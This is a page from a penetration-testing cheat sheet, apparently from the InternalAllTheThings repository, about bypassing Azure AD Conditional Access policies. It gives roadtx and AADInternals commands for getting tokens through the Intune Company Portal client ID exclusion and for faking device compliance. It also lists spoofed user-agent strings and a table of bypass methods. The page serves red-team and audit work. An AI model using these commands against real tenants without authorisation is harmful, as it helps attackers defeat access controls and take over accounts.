azure-ad-conditional-access-policy.md (5803B)
1 --- 2 title: "Azure AD - Conditional Access Policy" 3 section: "Cloud" 4 sectionSlug: "cloud" 5 sourcePath: "docs/cloud/azure/azure-ad-conditional-access-policy.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cloud/azure/azure-ad-conditional-access-policy.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Azure AD - Conditional Access Policy 12 13 Conditional Access is used to restrict access to resources to compliant devices only. 14 15 * [rbnroot/CAPSlock](https://github.com/rbnroot/CAPSlock) - Offline Conditional Access (CA) analysis tool built on top of a roadrecon database. 16 * [absolomb/FindMeAccess](https://github.com/absolomb/FindMeAccess) - Tool for finding gaps in Azure/M365 MFA requirements for different resources, client ids, and user agents. 17 18 ## Enumerate Conditional Access Policies 19 20 * Enumerate Conditional Access Policies: `roadrecon plugin policies` (query the local database) 21 22 | CAP | Bypass | 23 | ------------------------- | --------------------------------------------------------------- | 24 | Location / IP ranges | Corporate VPN, Guest Wifi | 25 | Platform requirement | User-Agent switcher (Android, PS4, Linux, ...) | 26 | Protocol requirement | Use another protocol (e.g for e-mail acccess: POP, IMAP, SMTP) | 27 | Azure AD Joined Device | Try to join a VM (Work Access) | 28 | Compliant Device (Intune) | Fake device compliance | 29 | Device requirement | / | 30 | MFA | / | 31 | Legacy Protocols | / | 32 | Domain Joined | / | 33 34 ```ps1 35 python3 CAPSlock.py analyze -u <userprincipalname> --resource <resource-id> [options] 36 python3 CAPSlock.py what-if -u <userprincipalname> --resource <resource-id> [options] 37 python3 CAPSlock.py web-gui --port 8080 38 ``` 39 40 ## Bypassing CAP by faking device compliance 41 42 ### Intune Company Portal Client ID Bypass 43 44 Use Intune Company Portal Client ID (`9ba1a5c7-f17a-4de9-a1f1-6178c8d51223`), to run `roadrecon` even when there is a device compliance policy. it is a hardcoded and undocumented exclusion in Conditional Access for device compliance and has the `user_impersonation` rights on the AAD Graph. 45 46 * Client ID: `9ba1a5c7-f17a-4de9-a1f1-6178c8d51223` 47 48 ```ps1 49 roadtx gettokens -u $username -p $password -r msgraph -ua $windows_ua -c 9ba1a5c7-f17a-4de9-a1f1-6178c8d51223 # limite scope 50 roadtx gettokens -u $username -p $password -r aadgraph -ua $windows_ua -c 9ba1a5c7-f17a-4de9-a1f1-6178c8d51223 # user_impersonation scope 51 ``` 52 53 ### AAD Internals - Making your device compliant 54 55 ```powershell 56 # Get an access token for AAD join and save to cache 57 Get-AADIntAccessTokenForAADJoin -SaveToCache 58 59 # Join the device to Azure AD 60 Join-AADIntDeviceToAzureAD -DeviceName "SixByFour" -DeviceType "Commodore" -OSVersion "C64" 61 62 # Marking device compliant - option 1: Registering device to Intune 63 # Get an access token for Intune MDM and save to cache (prompts for credentials) 64 Get-AADIntAccessTokenForIntuneMDM -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7.pfx -SaveToCache 65 66 # Join the device to Intune 67 Join-AADIntDeviceToIntune -DeviceName "SixByFour" 68 69 # Start the call back 70 Start-AADIntDeviceIntuneCallback -PfxFileName .\d03994c9-24f8-41ba-a156-1805998d6dc7-MDM.pfx -DeviceName "SixByFour" 71 ``` 72 73 ## Bypassing CAP with device.trustType 74 75 The trustType property is an internal attribute that defines the relationship between the device and Azure AD. 76 When the condition of CAP is `device.trustType -eq "<TYPE>"`, the values can be: 77 78 * `AzureAD`: Azure AD joined devices 79 * `Workplace`: Azure AD registered devices 80 * `ServerAD`: Hybrid joined devices 81 82 ## Bypassing CAP with user agent 83 84 There are several devices you can use to authenticate and interact with a service. 85 Try several `User-Agent` to get access to the resources: 86 87 * Windows: `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 GLS/100.10.9939.100` 88 * Linux: `Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 uacq` 89 * macOS: `Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 uacq` 90 * Android: `Mozilla/5.0 (Linux; Android 13) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.117 Mobile Safari/537.36` 91 * iOS: `Mozilla/5.0 (iPhone; CPU iPhone OS 15_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/98.0.4758.85 Mobile/15E148 Safari/604.1` 92 * WindowsPhone: `Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Lumia 650) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Safari/537.36` 93 94 ## Bypassing CAP with location 95 96 Try different IP locations using a VPN. 97 98 ## References 99 100 * [Bypassing Conditional Access policies that have a resource exclusion - Dirk-jan Mollema - June 22, 2026](https://dirkjanm.io/bypassing-conditional-access-with-resource-exclusion/) 101 * [Conditional Access bypasses - Fabian Bader - November 30, 2025](https://cloudbrothers.info/en/conditional-access-bypasses/) 102 * [Finding Entra ID CA Bypasses - the structured way - Dirk-jan Mollema and Fabian Bader - June 23, 2025](https://troopers.de/troopers25/talks/tfsfqs/) 103 * [STOP THE CAP: Making Entra ID Conditional Access Make Sense Offline - Lee Robinson - February 17, 2026](https://specterops.io/blog/2026/02/17/stop-the-cap-making-entra-id-conditional-access-make-sense-offline/)